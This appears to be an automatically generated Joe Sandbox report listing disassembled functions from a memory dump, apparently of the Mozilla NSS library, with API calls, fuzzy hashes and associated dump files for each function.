Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_DeleteFileUtilValuefreemalloc
String ID:
API String ID: 3873820591-0
Opcode ID: 3b82ba231935348d51b22950566ca7698e323a5802b0c308039dcbb2374541c5
Instruction ID: d9d66d39826741b43819fcbdda10904b97e6ca6cb911f99fe494f247dcc90839
Opcode Fuzzy Hash: 3b82ba231935348d51b22950566ca7698e323a5802b0c308039dcbb2374541c5
Instruction Fuzzy Hash: E2F0B4B53061023BFB24267A6D49E37365DCB42AFAF140335BE3AD59C1EA40CC118279

Function 6C6B7C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6C6B7C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6B7C83
malloc.MOZGLUE(00000001), ref: 6C6B7C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C6B7C9F
PR_GetCurrentThread.NSS3 ref: 6C6B7CAD

Part of subcall function 6C669BF0: TlsGetValue.KERNEL32(?,?,?,6C6B0A75), ref: 6C669C07

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: caa4dc3931a21bace99908bb1be9834a94d8195957b2059762917f1b7ef02912
Instruction ID: 34e72c5be992ef17cf4f293eb20bfc2cc4c80099295c63252e86833e08fb06e3
Opcode Fuzzy Hash: caa4dc3931a21bace99908bb1be9834a94d8195957b2059762917f1b7ef02912
Instruction Fuzzy Hash: AAF0C2B19102066FEB009F3A9C099577758EF42369B018439EC09D3B00E735F124CBED

Function 6C6BADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C6BA6D8), ref: 6C6BAE0D
free.MOZGLUE(?), ref: 6C6BAE14
DeleteCriticalSection.KERNEL32(6C6BA6D8), ref: 6C6BAE36
free.MOZGLUE(?), ref: 6C6BAE3D
free.MOZGLUE(00000000,00000000,?,?,6C6BA6D8), ref: 6C6BAE47

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: dcf99cf3858bee194d509f64f91bebbf52caf181894628c6ab9f2c956da4a128
Instruction ID: a3487b37d456b520bef265d97a239c2e4978df19505ed355d97d5966ae9d3bc4
Opcode Fuzzy Hash: dcf99cf3858bee194d509f64f91bebbf52caf181894628c6ab9f2c956da4a128
Instruction Fuzzy Hash: D9F0C275201A02A7CB209F69A8489177779BE86774B100328F13B83981D732F027D7D9

Function 6C53BCD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(6C6DAAF9,?), ref: 6C53BE37

Strings

winFileSize, xrefs: 6C53BF07
Pkl, xrefs: 6C53BED4
kl, xrefs: 6C53BDD7

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_mprintf
String ID: kl$Pkl$winFileSize
API String ID: 4246442610-2393575200
Opcode ID: 035e767ab2bde70ac28a8102fee387e8bf467c9a31d7c4923328d89b74f164ac
Instruction ID: fdf2b9d335ab872e9075ca97e024bfe575a2a884c70f2515203853dbb351e9c6
Opcode Fuzzy Hash: 035e767ab2bde70ac28a8102fee387e8bf467c9a31d7c4923328d89b74f164ac
Instruction Fuzzy Hash: 9161C131A04A25DFDB05DF29C8807A9BBB2FF8A314F045EA5D4198BB80E730E855CBD5

Function 6C547C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C547D35

Strings

%s at line %d of [%.10s], xrefs: 6C547D2E
database corruption, xrefs: 6C547D29
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C547D13, 6C547D1F, 6C547D47, 6C547D53, 6C547D5F

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 99206ca7ba117578c1e1d8c14cf5abd2c55139c4b65248617486b71086693d42
Instruction ID: 3ec35bcf9b462d5990c4e0b296abf77afb3f6fd426eaafb22aeff76a3531a520
Opcode Fuzzy Hash: 99206ca7ba117578c1e1d8c14cf5abd2c55139c4b65248617486b71086693d42
Instruction Fuzzy Hash: 60312871E0422997C710CF9DCC809BEB7F1EF88345B598596E444B7B86D271DC52CBA4

Function 6C536C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C536D36

Strings

%s at line %d of [%.10s], xrefs: 6C536D2F
database corruption, xrefs: 6C536D2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C536D20

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 762c4f91fbc6ccc266fbaa0aaad3574ecd62cf1133299b5116e070ac8270ec2a
Instruction ID: 8871747a4a93fb4b304848d946fe239860dde584c29c1a31c99659742a8d1a39
Opcode Fuzzy Hash: 762c4f91fbc6ccc266fbaa0aaad3574ecd62cf1133299b5116e070ac8270ec2a
Instruction Fuzzy Hash: 2E21FC306043149BC711CE1ADC41B5AB7E2BF84308F248A2DD84D9BB91FB70F9498B92

Function 6C612FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+al,6C6132C2,<+al,00000000,00000000,?), ref: 6C612FDA

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C61300B

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C61302A

Part of subcall function 6C600840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6008B4

Part of subcall function 6C5EC3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C5EC45D
Part of subcall function 6C5EC3D0: TlsGetValue.KERNEL32 ref: 6C5EC494
Part of subcall function 6C5EC3D0: EnterCriticalSection.KERNEL32(?), ref: 6C5EC4A9
Part of subcall function 6C5EC3D0: PR_Unlock.NSS3(?), ref: 6C5EC4F4

Strings

<+al, xrefs: 6C612FD0

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+al
API String ID: 2538134263-2537768593
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction ID: 52ffd5809dcac5addcd626af0fbb10fb65594e74f440129e1969759d38a99f16
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: EF11E7F6B00104ABDB008E69DC00A9B77D9AB8536DF184134F91DD7B80E772ED15C7A5

Function 6C66CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C66CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C66CC7B), ref: 6C66CD7A
Part of subcall function 6C66CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C66CD8E
Part of subcall function 6C66CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C66CDA5
Part of subcall function 6C66CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C66CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C66CCB5
memcpy.VCRUNTIME140(6C7014F4,6C7002AC,00000090), ref: 6C66CCD3
memcpy.VCRUNTIME140(6C701588,6C7002AC,00000090), ref: 6C66CD2B

Part of subcall function 6C589AC0: socket.WSOCK32(?,00000017,6C5899BE), ref: 6C589AE6
Part of subcall function 6C589AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C5899BE), ref: 6C589AFC

Part of subcall function 6C590590: closesocket.WSOCK32(6C589A8F,?,?,6C589A8F,00000000), ref: 6C590597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C66CCB0

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 63c13eed9c57e4b27cb35ecce2e16587dd6028e059f52df9a95e9186677aaf8f
Instruction ID: 5f2cdb3a557b1b32bb810db4d011c4f37f1b058a6ab7312412c23a2134bff676
Opcode Fuzzy Hash: 63c13eed9c57e4b27cb35ecce2e16587dd6028e059f52df9a95e9186677aaf8f
Instruction Fuzzy Hash: 7B110AF1B002409FDB009F6A98467463AE8978631CF14153DF51AEFB41EF71D4148BDA

Function 6C537F90 Relevance: 6.2, APIs: 4, Instructions: 223COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C5381DF
LeaveCriticalSection.KERNEL32(?), ref: 6C538239
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C538255
sqlite3_free.NSS3(00000000), ref: 6C538260

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavememcpysqlite3_free
String ID:
API String ID: 1525636458-0
Opcode ID: b43f698dc9ba8b6a92f4572f090cc7b3d550eb4d71371686d08df42ae343c2bb
Instruction ID: b4442d27e6df2e88bfad46738e742986f35d6a3129bd2b5a2a20b34c2a91b617
Opcode Fuzzy Hash: b43f698dc9ba8b6a92f4572f090cc7b3d550eb4d71371686d08df42ae343c2bb
Instruction Fuzzy Hash: 5C918F71B01618CBEB08DFA1EC887ADBBB1BF06304F14112FD41ADB654EB396955CB86

Function 6C611D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C611D8F

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C611DA6

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C611E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C611ED0

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: d8f4fb6d18bcb2d5a93b352a3f0b9c659acc39f65f34ba9c964f4546e25a1e71
Instruction ID: 433109fb48b78fa0894fc40da75a375371d895805a84cbb296670659dcc21027
Opcode Fuzzy Hash: d8f4fb6d18bcb2d5a93b352a3f0b9c659acc39f65f34ba9c964f4546e25a1e71
Instruction Fuzzy Hash: 54517775A04309CFDB04CF98D884BAEBBB6BF59309F144129E819AFB50D731E946CB94

Function 6C664FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C5485D2,00000000,?,?), ref: 6C664FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C66500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6650C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6650D6

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: d9114e23c6bfb31b6199afef45c5624302afa0c6c452978e5d5b15f22b7ae7d7
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: 134181B2A002118FCB18CF19DCD279AB7E1BF4431871D46ADD84ACBB02E775E891CB95

Function 6C58FFA0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3(00000000,?,?,?,6C58FDFE), ref: 6C58FFAD

Part of subcall function 6C52CA30: EnterCriticalSection.KERNEL32(?,?,?,6C58F9C9,?,6C58F4DA,6C58F9C9,?,?,6C55369A), ref: 6C52CA7A
Part of subcall function 6C52CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C52CB26

memset.VCRUNTIME140(00000000,00000000,00000008,00000000,?,?,?,6C58FDFE), ref: 6C58FFDF
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,?,?,6C58FDFE), ref: 6C59001C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,6C58FDFE), ref: 6C59006F

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_initialize
String ID:
API String ID: 2358433136-0
Opcode ID: ae36799ee94ae7b3cc2316ab897e79e761bdc9a3f4fee6c8fd9d026f60c9f56e
Instruction ID: 8b39be9075028bdd758d90586324c3984867d73802379a9d20d0b27fa5daa107
Opcode Fuzzy Hash: ae36799ee94ae7b3cc2316ab897e79e761bdc9a3f4fee6c8fd9d026f60c9f56e
Instruction Fuzzy Hash: 6441F1B1F012559BDB08DF65EC89AAE7775FF8A304F04047ED81693700DB35A911CBA5

Function 6C613D40 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,-0000002C,?,6C61127F,?), ref: 6C613D89

Part of subcall function 6C6106F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C612E70,00000000), ref: 6C610701

SECOID_FindOID_Util.NSS3(FFFFFFFF,?), ref: 6C613DD3

Part of subcall function 6C6007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C5A8298,?,?,?,6C59FCE5,?), ref: 6C6007BF
Part of subcall function 6C6007B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6007E6
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C60081B
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C600825

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Error$HashLookupTableUtil$Alloc_ConstFind
String ID:
API String ID: 99596740-0
Opcode ID: 1dd3710fe856fccb4bbedb8fb2b3a5d8a701cf2a1dfbd6974d37a5017a42826d
Instruction ID: 759f9b16346fcb877ad3847c8d4770781d5cb5325e8c02280e46342eed1dbe15
Opcode Fuzzy Hash: 1dd3710fe856fccb4bbedb8fb2b3a5d8a701cf2a1dfbd6974d37a5017a42826d
Instruction Fuzzy Hash: EC312679E1E61497FB14462C9840B9A72A4AB4232EF24423BDF17C7FD1E721EC0186CE

Function 6C677DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C677E10
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C677EA6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C677EB5
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C677ED8

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction ID: f96f3287298f85ebb0947a1d13df1b98c476f9f8e2ed814164dfe5f74455f2cd
Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction Fuzzy Hash: B131B7B2A001118FD715CF08DC9099AB7E2FF8831872B45B9C8595B711EB71EC55CBE5

Function 6C62DF00 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 6C5B3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5CAE42), ref: 6C5B30AA
Part of subcall function 6C5B3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5B30C7
Part of subcall function 6C5B3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C5B30E5
Part of subcall function 6C5B3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5B3116
Part of subcall function 6C5B3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5B312B
